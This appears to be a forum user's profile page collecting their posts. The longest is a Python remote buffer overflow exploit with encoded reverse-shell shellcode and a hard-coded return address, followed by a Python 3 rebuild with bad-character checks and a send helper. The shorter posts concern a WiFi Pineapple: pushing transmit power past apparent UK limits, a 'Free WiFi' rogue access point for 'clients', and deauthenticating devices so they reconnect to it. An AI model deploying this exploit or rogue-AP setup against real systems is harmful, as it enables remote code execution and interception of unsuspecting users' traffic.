confuscious1080's Achievements
  1. Hi, I am attempting to exploit a remote buffer overflow as part of a test lab environment. The exploit works fine in a Windows 7 test VM and I can get a reverse Meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM. However, when I attempt this in the test environment against the machine that I know is running the application on port 42424, I do not get the reverse shell. Now, I have tried this with both x86 and x64 shellcode; if I test locally on the Kali machine I can crash the application, but again I also do not get a shell. My exploit code is below:

#!/usr/bin/env python2
import socket

ServiceManagerIP = ""          # target host (left blank in the post)
ServiceManagerPort = 42424

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ServiceManagerIP, ServiceManagerPort))

payload = "\xc3" * 146                        # Junk bytes up to the saved return address
# 77E9F7DF, written little-endian, followed by a 16-byte NOP sled
payload += "\xDF\xF7\xE9\x77" + "\x90" * 16
# Shellcode to be executed by the application
payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1"
            "\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7"
            "\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17"
            "\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05"
            "\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40"
            "\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92"
            "\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a"
            "\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4"
            "\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b"
            "\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb"
            "\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38"
            "\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7"
            "\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80"
            "\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5"
            "\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a"
            "\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3"
            "\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c"
            "\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa"
            "\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d"
            "\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80"
            "\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb"
            "\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62"
            "\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75"
            "\x35\x96\xaf\x2a\x36\xb3")

s.send(payload + "\r\n")
data = s.recv(1024)   # the posted script read len(msg), but msg was never defined (NameError)
s.recv(1024)
s.close()
print data
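Added example, not the poster's code: a Python 3 payload builder with the pre-flight checks a practitioner runs when an exploit that works in one VM fails against another host. It reuses the post's layout (146 junk bytes, return address 0x77E9F7DF, 16-byte NOP sled, shellcode, request terminated by "\r\n", port 42424) and checks two of the usual culprits: a bad byte in the return address or shellcode, and a return address that is only valid for one build of a system DLL. The bad-character set (NUL and the two line terminators, on the assumption that the service reads a line), the four-INT3 stand-in shellcode, and the `send_payload` helper are assumptions, not anything the post states.

```python
import socket
import struct

# Assumption: the service reads a "\r\n"-terminated line, so NUL and the two
# line terminators would cut the request short before the shellcode lands.
BADCHARS = b"\x00\x0a\x0d"

# Constructed stand-in for the poster's msfvenom shellcode: four INT3 breakpoints.
# Replace with real shellcode; keep it as bytes, not a str.
DUMMY_SHELLCODE = b"\xcc" * 4


def build_payload(junk_len, ret_addr, nop_len, shellcode, junk_byte=b"A"):
    """junk + little-endian return address + NOP sled + shellcode (same layout as the post)."""
    if len(junk_byte) != 1:
        raise ValueError("junk_byte must be exactly one byte")
    return (junk_byte * junk_len
            + struct.pack("<I", ret_addr)   # 0x77E9F7DF -> b"\xdf\xf7\xe9\x77"
            + b"\x90" * nop_len
            + shellcode)


def find_bad_chars(blob, badchars=BADCHARS):
    """Every (offset, byte) in blob that is in badchars; an empty list means clean."""
    return [(i, b) for i, b in enumerate(blob) if b in badchars]


def preflight(payload, junk_len, shellcode_len, badchars=BADCHARS):
    """Checks worth reading before sending anything, returned as a dict."""
    ret = payload[junk_len:junk_len + 4]
    return {
        "total_len": len(payload),
        "ret_offset": junk_len,
        "ret_bytes": ret.hex(),
        "bad_in_ret": find_bad_chars(ret, badchars),
        "bad_in_shellcode": find_bad_chars(payload[-shellcode_len:], badchars),
        "shellcode_offset": len(payload) - shellcode_len,
    }


def send_payload(host, port, payload, timeout=5.0):
    """Deliver the payload the way the post does: one line, then read a reply.
    Hypothetical helper; the checks above never call it, and a reverse-shell
    listener must already be up before it is used."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload + b"\r\n")
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    # Offsets and address from the post. 0x77E9F7DF is only valid for the exact
    # DLL build (with ASLR off) it was taken from; that is the first thing to
    # re-check when the same script works in one VM and not on another host.
    p = build_payload(146, 0x77E9F7DF, 16, DUMMY_SHELLCODE)
    report = preflight(p, 146, len(DUMMY_SHELLCODE))
    for k, v in report.items():
        print(f"{k}: {v}")
    # send_payload("", 42424, p)   # fill in the target host before enabling
```

If `bad_in_ret` or `bad_in_shellcode` is non-empty, re-generate the shellcode with those bytes excluded (or pick a different return address) before blaming the listener; if both are empty and the payload still only crashes the remote service, confirm the remote module base and version match the VM the address came from.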
  2. Do you know where I can order this in the UK? I presume from the ALFA site; shipping from the Hak5 store takes ages as it's coming from America.
  3. Oh, so this is what I needed, an actual amplifier, lol. I just ordered two of the 7 dBi Alfa antennas and it made no difference. I will also buy this additional amplifier as well.
  4. Ah okay, well I also followed the instructions and ran the TX power unlocker script, but it has not worked or upgraded the TX power at all for any interface.
  5. Checked my Free WiFi Access Point as well, the one that my clients will connect to, which I guess is the actual one that matters, and the signal strength for that is only 18 dbmi. I live in the UK; could this be because of law restrictions, having to be under 20 dbmi??
  6. When I connect to the Management AP of the WiFi Pineapple (not the one configured for clients to connect to) I only have a signal strength of 26 dBm, compared to my actual BT router access point, which is at 65 dBm. This is also with one of the Alfa 7 dBi antennas connected up to the WiFi Pineapple.
  7. Ah yes, that makes sense that having a bigger antenna will not increase the chipset's output power for the device. Is there a way to increase this as well in Kali Linux? I've tried the whole `iw reg` thing on the command line, but I have my suspicions that it is not actually doing anything.
  8. My TX power is still 22 dBm as well on the wlan0 interface in Kali. Got the antenna working; how do I take advantage of the 7 dBi that I have?
  9. Hi, I recently got one of these from eBay to go on my NANO Basic piece of kit. I noticed that they sell them on the Hak5 website as well. So I took off the Basic's antenna, put on the Alfa, ran the shell script to configure the Pineapple, got the site address, logged in, tried a recon scan, and nothing at all; it could not scan. Is there something else I need to do to configure it? The antenna came with no drivers or anything; I thought I could just screw it on the Pineapple and I would be away.
  10. Hmm, I am not sure whether to buy it from China on eBay :p. Might just get this: Details about Alfa Network APA-M04 2.4GHz 7 dBi high gain directional indoor panel antenna wi
  11. Was thinking of getting a 5.8GHz 16dBi Outdoor Directional Yagi Antenna With N-Female For Signal Booster from China, lol. Will it fit on the WiFi Pineapple though, and would it melt it.... lol
  12. Nope, I just have the Pineapple, not the SD card that comes with it. Yeah, I think it's because I've run out of space on the Pineapple.
  13. I have my Android device connected up now; I've been using DWall on it. Trying to use nmap, but for some reason the Pineapple will not install the dependencies.
  14. But I thought if you could deauth a MAC off of a router first, then you could get them to connect to you afterwards.